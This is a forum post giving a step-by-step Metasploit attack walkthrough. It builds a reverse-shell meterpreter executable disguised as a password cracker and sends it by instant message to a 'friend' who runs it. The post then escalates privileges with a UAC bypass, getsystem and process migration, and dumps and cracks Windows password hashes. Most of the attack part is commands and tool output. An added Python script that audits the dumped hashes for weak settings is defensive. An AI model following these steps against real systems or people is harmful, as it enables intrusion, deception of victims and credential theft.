crossbower Posted February 1, 2014 (edited)

Binary Payloads

It seems like Metasploit is full of interesting and useful features. One of these is the ability to generate an executable from a Metasploit payload. This can be very useful in situations such as social engineering: if you can get a user to run your payload for you, there is no reason to go through the trouble of exploiting any software.

Example with a little joke: my friend needs a good passwd cracker. I created for him the best passwd cracker.

How to create a binary payload: Binary Payloads - Metasploit Unleashed

We generate a Windows meterpreter executable that will connect back to us on port 443:

msfpayload -p windows/meterpreter/reverse_tcp LHOST=192.168.1.19 LPORT=443 X > /root/cracker.exe

Now the Windows executable is created, we will use 'exploit/multi/handler', which is a stub that handles exploits launched outside of the framework.

msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/shell/reverse_tcp
payload => windows/shell/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.19
LHOST => 192.168.1.19
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > exploit

And the listener started, waiting for a victim:

msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.19:443
[*] Starting the payload handler...
[*] Sending stage (474 bytes)
[*] Command shell session 1 opened (192.168.1.91:443 -> 192.168.1.19:3250)

And I delivered it via IM to "my friend"... he executed the binary payload and the game started for hunting hashdump.

Metasploit has a Meterpreter script, 'getsystem', that will use a number of different techniques to attempt to gain SYSTEM level privileges on the remote system. More info on privilege escalation here: Privilege Escalation - Metasploit Unleashed

Before we take a hashdump we need to be running with SYSTEM privileges.

meterpreter > getuid
Server username: redmon-PC\redmon

This session I put in the background (session 1) and I used the meterpreter module bypassuac.

Reference: Bypass Windows 7 x86/x64 UAC Fully Patched - Meterpreter Module ?
Source: Windows Escalate UAC Protection Bypass

msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set SESSION 1
msf exploit(bypassuac) > set PAYLOAD windows/meterpreter/revers_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(bypassuac) > set LHOST 192.168.1.19
LHOST => 192.168.1.19
msf exploit(bypassuac) > set LPORT 8989
LPORT => 8989
msf exploit(bypassuac) > exploit
[*] Started reverse handler on 192.168.1.19:5555
[*] UAC is Enabled, checking level...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[*] Uploading the bypass UAC executable to the filesystem...
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem....
[*] Sending stage (769024 bytes) to 192.168.1.202
[*] Meterpreter session 2 opened (192.168.1.19:5555 -> 192.168.1.202:49171)

Now migrate to one of the processes which is running with SYSTEM privileges. Running the ps command we see a process we need for SYSTEM privs:

1996 448 SearchIndexer.exe x86 0 NT AUTHORITY\SYSTEM

Migrating to the process SearchIndexer.exe:

meterpreter > migrate 1996
[*] Migrating from 3456 to 1996...
[*] Migration completed successfully.

Now we run the 'getsystem' techniques to attempt to gain SYSTEM level privileges.

meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

NOW THE SYSTEM IS READY FOR ME TO TAKE A HASHDUMP

meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::

The hashes I cracked with the john passwd cracker. Metasploit has jtr modules for cracking.

Sorry for mistakes, I was tired and still working at the workplace.

VIDEO TUT: http://www.youtube.com/watch?v=j6dZIrO0890

Edited February 2, 2014 by crossbower
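The hashdump lines in the post above are in pwdump format (user:RID:LM hash:NT hash:::). As an added example that is not part of crossbower's post, here is a small Python audit script that parses such a dump and reports the conditions a defender would want to fix before any cracking is attempted: accounts whose NT hash is the hash of the empty string (a blank password, which the Guest line above shows), accounts that still have an LM hash stored (the weak legacy hash), and accounts that share the same NT hash (the same password reused). The sample input is the post's own four lines with the extraction spaces removed; EMPTY_LM and EMPTY_NT are the well-known hashes of the empty string; the function names are my own.

```python
import re

# Sample input: the four hashdump lines from the post above (pwdump format).
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:b963c57010f218edc2cc3c229b5e4d0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HomeGroupUser$:1001:aad3b435b51404eeaad3b435b51404ee:f08f62a151d0b888dd5fe91187c3d968:::
redmon:1002:aad3b435b51404eeaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
"""

# Well-known hashes of the empty string: an "empty" LM field means no LM hash
# is stored (good); an NT hash equal to EMPTY_NT means the password is blank.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:RID:32 hex chars:32 hex chars::: (Windows user names cannot contain ':').
LINE_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")


def is_pwdump_line(line):
    """True if a single line is well-formed pwdump output."""
    return LINE_RE.match(line.strip()) is not None


def parse_pwdump(text):
    """Parse pwdump text into a list of dicts; blank lines are skipped and a
    malformed line raises ValueError with its line number."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        m = LINE_RE.match(line)
        if m is None:
            raise ValueError(f"line {lineno}: not pwdump format: {line!r}")
        user, rid, lm, nt = m.groups()
        records.append({"user": user, "rid": int(rid),
                        "lm": lm.lower(), "nt": nt.lower()})
    return records


def audit(records):
    """Return (user, finding) tuples for blank passwords, stored LM hashes and
    NT hashes reused across accounts, in the order the records appear."""
    findings = []
    by_nt = {}
    for r in records:
        if r["nt"] == EMPTY_NT:
            findings.append((r["user"], "blank password"))
        if r["lm"] != EMPTY_LM:
            findings.append((r["user"], "LM hash stored (weak legacy hash)"))
        by_nt.setdefault(r["nt"], []).append(r["user"])
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:
            for u in users:
                others = ", ".join(x for x in users if x != u)
                findings.append((u, f"password shared with {others}"))
    return findings


if __name__ == "__main__":
    for user, finding in audit(parse_pwdump(SAMPLE_HASHDUMP)):
        print(f"{user}: {finding}")
```

Run against the post's dump, the script reports only that Guest has a blank password; every account has the empty LM value, so no legacy LM hashes are stored, and no NT hash is reused. A pwdump line does not say whether an account is enabled, so a blank-password finding on a built-in account such as Guest should be checked against the account's status before it is treated as exposure.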